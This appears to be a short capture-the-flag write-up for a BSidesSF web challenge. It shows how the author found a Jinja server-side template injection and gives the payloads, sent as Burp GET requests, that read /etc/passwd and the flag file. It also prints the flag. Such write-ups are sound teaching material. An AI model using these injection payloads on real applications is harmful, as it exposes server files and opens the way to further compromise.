View the source code i can see server.py find and i open it
http://zumbo-8ac445b1.ctf.bsidessf.net/server.py
and i found with open(‘/flag’) which mean you have to find the way to reach to flag file.
I also found Jinja template injection in this, just try:
http://zumbo-8ac445b1.ctf.bsidessf.net/index.template{{7*7}} and you will see
Open burpsuite and test:
First :
GET /index.template{{”.__class__.__mro__[2].__subclasses__()[40](‘/etc/passwd’).read()}} HTTP/1.1 -> it will show the content of passwd file
Second try:
GET /index.template{{”.__class__.__mro__[2].__subclasses__()[40](‘/flag’).read()}} HTTP/1.1
-> TADA -> FLAG: RUNNER_ON_SECOND_BASE